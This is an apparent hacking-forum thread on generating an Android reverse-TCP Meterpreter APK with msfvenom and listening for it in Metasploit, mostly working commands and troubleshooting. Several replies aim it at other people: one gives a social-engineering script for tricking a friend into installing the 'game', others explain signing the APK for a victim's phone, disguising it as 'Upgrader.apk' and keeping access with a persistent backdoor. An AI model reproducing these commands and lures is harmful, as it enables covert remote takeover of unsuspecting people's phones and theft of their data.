Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?

Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?

Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk

Which would create the APK, and then
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ip
To start listening, and it always worked, once the APK was executed on the android device (always my device, btw)

Now, I've tried substituting msfvenom -p for msfpayload, and it creates the APK, but when it is run and the listener is started, it does not connect.

Does anyone know what I'm doing wrong? I can't seem to figure out this new method of things...

58 Responses

Can you give us screenshots and the full command, please?

This is the command used to create the APK, which outputs a "hack.apk" in my root folder:

And this is the command used to start the listener (which used to result in my having control over the Android device, prior to the msfvenom update):

(I blurred names and IP's)
Also, if it makes any difference, I'm running Kali Linux.
And yes, it was intentional :)'s super simple.
First create a payload :
root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > filename.apk

Now, email this file to the victim, but before you do that:

root@kali :~ # msfconsole
root@kali :~ # use multi/handler
root@kali :~ # set PAYLOAD android/meterpreter/reverse_tcp
root@kali :~ #set LHOST (your ip)
root@kali :~ # set LPORT 5555
root@kali :~ # exploit

Now, wait for the victim to download the file and then install it on his/her phone. Use social engineering to achieve this. Say for example : "Hey, dude I just made a new game. Unfortunately I don't have anyone to try it out for me and give a review. So, will you help me? Please. Thanks, man, I appericiate it." just an example!

Now the dumb "FRIEND" will install it and then open it and congrats : YOU GOT A METERPRETER SHELL on someone's phone. Now I'll leave u to ur imagination!

LOL!!! I died laughing when I saw that. I mean it's only his LAN so at least it isn't a bad slip up.

hi! in msfvenom command you missed lport!

Hi there!
The right syntax for msfvenom is:
msfvenom -p android/meterpreter/reversetcp LHOST=yourip -o /testdir/test.apk_

i done these steps ,after created the app i try to install but its showing pharse error what i do pls tell me ......

After generating the payload sign the .apk with d2j-apk-sign (name of your apk file) Now you have signed your apk file .Send it to the Victim

It says invalid payload :- andriod/meterpreter/reversetcp
What should i do ....?


same error " invalid payload" though the syntax is correct have checked it many times.what should i do next?

check spelling

May be a obvious question (beginner here), but how do you figure out what lport number to use?

This worked perfect for me :
terminal : msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost {your Ip}
set lport 4444

Once the victim tries to run it in his device. You'll get a meterpreter session.

I did everything but when i try to install apk file in my oen android device to check its says application not installed! Please can amyone tell me how to fix this error thank you!

sorry i build paylaod but I can't install it THE error when i install it
application not installed

Check out my video for this tutorial!

One question.
The process worked perfectly for me.

But when you restart the computer,could you again connect to
victim phone and how?

I tried again as well as the first time but nothing:

use exploit/multi/handler
set payload android/meterpreter/reversetcp
set lhost {Ip}
set lport 4444

If anyone knows the answer how can we connect again on our "infected" phone ore we need to re-send the file?
Please help.


actually after you exploited ur victim for first time .. then and there create a persistent backdoor that would allow you access all the time .. regardless of system rebooting

And how can i create that persistent backdoor ? armitage ?

Hi guys, everything worked perfectly for me but when I sent the APK file to my phone it could not be install it shows ( parsing error ) because the backdoor file size was "0" I don't know why anyone can help please !

u have some syntax error in making the APK file,

msfvenom -p android/meterpreter/reversetcp LHOST=" ur IP" LPORT=" the port u want to listen on it" R > /PATH/TO/file.APK

there is an underscore >>> <<< between reverse and tcp

Hi Guys greetings, you know the cause of this problem when you start the exploit, I have been using in my Androdi 5.0 but always throws me the same fault

Meterpreter session 1 closed. Reason: Died

i can't install the app i created in my phone iwhat i should do ?

when i heck in lan i have no prob

but out lan i get this

Meterpreter session 1 closed. Reason: Died

You also can download the "One Click APK Signer" ()

Then drag and drop your Payload.apk on the on the one click signer cmd and it creates a signed Payload.apk that you can install on your victim Android!


i used LPORT=4444 and by online tool i checked and came to know that port 4444 is not open what is problem can anybody tell me.... port 80 is opened and i have tried by making virtual server and port forwarding but nothing worked..... can anybody resolve this port problem?? can i use port 80 for exploiting>>>???

thats because windows firewall blocks the same... add an exception or disable firewall temporarily...

If the app is uninstalled we can't get access to the victim's is there any other way like if it is once installed it can't be removed or running in background script without the use of app

how should i use it for publi is not working for public up...i cannot bind with public ip

I tried first tep using following comman in linux kali

msfvenom -p android/meterpreter/reversetcp LHOST= LPORT=4444 R > /root/Upgrader.apk

here is the command with the response can someone explain?

msfvenom -p android/meterpreter/reversetcp LHOST= LPORT=4444 R > /root/Upgrader.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8824 bytes

hey i got this error message did you patch this issue
can you help me

its right continue next step

i dont have rooted phone ..
is this support new smartphone i try this but not working on my android phone can you help me ..
how to hack normal android phone like unrooted mobiles
can you help me im just a beginner

msfvenom --platform Android -p android/meterpreter/reversetcp LHOST=192.168.x.x R > /root/Upgrader.apk
This command removes first Platform error, do it for others(mean add options for Arch & Encoders too.)
But in my case i successfully achieved my target. wihtout implementing arch and ecoders options. (Good Luck)

hey guys,

i created the payload file on VMware and im trying to copy it onto my host OS which is windows. but it isnt happening. the error states that the file doesnt belong to the location any longer. what do i do?

thank you

hey guys,
this is the output i'm getting when i type exploit. what should i do so that this changes

As soon as the Target Executes your Payload the rest will happen.

my exploit stays at this state even when i excecute apk on my phone

For starters guys, anyone who does this needs to learn to troubleshoot their scripts.
All but one person (RAIN RAIN) noticed the "--platform" module missing.

When it spits out an error read what it says, then check the help file (usually "-h" or "--help") to see what options are relevant. Then if all else fails, try google ;)

Try LPORT=8080. That's ONLY port that works for me.

msfvenom -p android/meterpreter/reversetcp LHOST=yourip LPORT=8080 > /root/Desktop/anything.apk

New terminal:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 8080

Hey, I could really use some help here...

this is the response that i get after typing the command and follows is either super weird or something super dumb on my part, but im sure one of you smart lads will crack it.. and no, that's not the ip address that i typed.

@Alva-Vostro-3546:~# msfvenom -p android/meterpreter/reversetcp lhost=X.X.X.X lport=4444 R > /root/mmupgrade.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes_

Try to replace reversetcp with reverse_tcp

when i gave '' use exploit/multi/handler'' its showing command not found ...what is reason ....guys help me

hi ..!
i'm new here i show your video it's very helpful & i like to know more informations please help me.
when i try i always get like this what can i do...?

I installed apk on my phone, but when i click the apk nothing happens. I do not get into meterpreter, instead there is a button named ReverseTCP inside the apk which i tried to click but didnt got the connection. I am attaching screenshot of the same. please tell me where i am going wrong.

Hi i'm new to the forum and to this kali linux thing.I entered the msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk and it works but then i try to enter msfconsole and i get this.What can be done about this?

Share Your Thoughts

  • Hot
  • Active